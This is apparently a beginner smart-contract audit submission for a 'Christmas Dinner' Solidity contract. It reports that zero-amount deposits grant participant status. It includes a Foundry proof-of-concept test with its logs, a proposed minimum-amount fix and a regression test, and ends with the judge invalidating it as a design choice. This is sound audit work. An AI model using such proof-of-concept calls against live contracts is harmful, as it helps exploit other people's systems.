Christmas Dinner

First Flight #31
Beginner Friendly · Foundry · Solidity
100 EXP
Submission Details
Severity: medium
Invalid

User becomes a participant by depositing a zero amount of tokens

Vulnerability Details

The deposit function allows a user to become a participant by depositing 0 tokens. This behaviour is unintended and results in:
Manipulation of participation status: a user can call the deposit function with a zero amount and gain participant privileges without contributing any tokens.

Impact

Malicious actors can exploit this to gain participant privileges without contributing to the system.

Tools Used

Foundry, VS Code

POC

function test__ZeroDepositToken() public {
    vm.startPrank(user1);
    // Record the user's wallet balance and in-contract balance before the call.
    uint256 balanceBefore = wbtc.balanceOf(user1);
    console.log("Wbtc Balance Before Deposit: ", balanceBefore);
    uint256 UserBalanceInContractBeforeDeposit = cd.balances(user1, address(wbtc));
    console.log("User wbtc Balance In Contract Before Deposit: ", UserBalanceInContractBeforeDeposit);
    // Deposit zero tokens: no transfer happens, but the participant flag is still set.
    cd.deposit(address(wbtc), 0);
    uint256 balanceAfter = wbtc.balanceOf(user1);
    uint256 UserBalanceInContractAfterDeposit = cd.balances(user1, address(wbtc));
    console.log("Wbtc Balance After Deposit: ", balanceAfter);
    console.log("User wbtc Balance In Contract After Deposit: ", UserBalanceInContractAfterDeposit);
    // Participation status is true even though both balances are unchanged.
    assert(cd.getParticipationStatus(user1) == true);
    console.log("Participation Status: ", cd.getParticipationStatus(user1));
    console.log("User Become participant by depoisiting zero amount of token");
    vm.stopPrank();
}
parwej@90CXC:/mnt/d/my Docs/2024-12-christmas-dinner$ forge test --mt test__ZeroDepositToken -vvv
[⠔] Compiling...
[⠢] Compiling 1 files with Solc 0.8.28
[⠰] Solc 0.8.28 finished in 610.33ms
Compiler run successful!
Ran 1 test for test/ChristmasDinnerTest.t.sol:ChristmasDinnerTest
[PASS] test__ZeroDepositToken() (gas: 69372)
Logs:
Wbtc Balance Before Deposit: 2000000000000000000
User wbtc Balance In Contract Before Deposit: 0
Wbtc Balance After Deposit: 2000000000000000000
User wbtc Balance In Contract After Deposit: 0
Participation Status: true
User Become participant by depoisiting zero amount of token
Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 6.73ms (6.15ms CPU time)
Ran 1 test suite in 11.99ms (6.73ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests)

Recommendations

function deposit(address _token, uint256 _amount) external beforeDeadline {
    if(!whitelisted[_token]) {
        revert NotSupportedToken();
    }
    // Added check: reject deposits below a minimum so that participant status
    // cannot be obtained for free. MIN_AMOUNT and the REQUIRE_MIN_AMOUNT() error
    // must be declared on the contract (parameter name matches the signature: _amount).
+   if(_amount < MIN_AMOUNT){
+       revert REQUIRE_MIN_AMOUNT();
+   }
    if(participant[msg.sender]){
        balances[msg.sender][_token] += _amount;
        IERC20(_token).transferFrom(msg.sender, address(this), _amount);
        emit GenerousAdditionalContribution(msg.sender, _amount);
    } else {
        participant[msg.sender] = true;
        balances[msg.sender][_token] += _amount;
        IERC20(_token).transferFrom(msg.sender, address(this), _amount);
        emit NewSignup(msg.sender, _amount, getParticipationStatus(msg.sender));
    }
}
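A regression test for the recommended fix, added here as an example and not part of the original submission. It assumes the fixed contract declares `error REQUIRE_MIN_AMOUNT();` and exposes a public `MIN_AMOUNT` getter, and that `cd`, `wbtc` and `user1` are the same fixtures used by the submission's own test.

```solidity
// Added example: checks that the minimum-amount guard rejects a zero deposit and
// that a legitimate deposit of MIN_AMOUNT still signs the user up. Assumes the fixed
// ChristmasDinner declares `error REQUIRE_MIN_AMOUNT();` and a public MIN_AMOUNT.
function test__ZeroDepositRevertsAfterFix() public {
    vm.startPrank(user1);

    // A zero-amount signup must revert instead of flipping the participant flag.
    vm.expectRevert(abi.encodeWithSignature("REQUIRE_MIN_AMOUNT()"));
    cd.deposit(address(wbtc), 0);
    assertFalse(cd.getParticipationStatus(user1));
    assertEq(cd.balances(user1, address(wbtc)), 0);

    // A deposit of exactly MIN_AMOUNT succeeds and moves real tokens.
    uint256 minAmount = cd.MIN_AMOUNT();
    wbtc.approve(address(cd), minAmount);
    uint256 walletBefore = wbtc.balanceOf(user1);
    cd.deposit(address(wbtc), minAmount);
    assertTrue(cd.getParticipationStatus(user1));
    assertEq(cd.balances(user1, address(wbtc)), minAmount);
    assertEq(wbtc.balanceOf(user1), walletBefore - minAmount);

    vm.stopPrank();
}
```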
Updates

Lead Judging Commences

0xtimefliez Lead Judge 8 months ago
Submission Judgement Published
Invalidated
Reason: Design choice
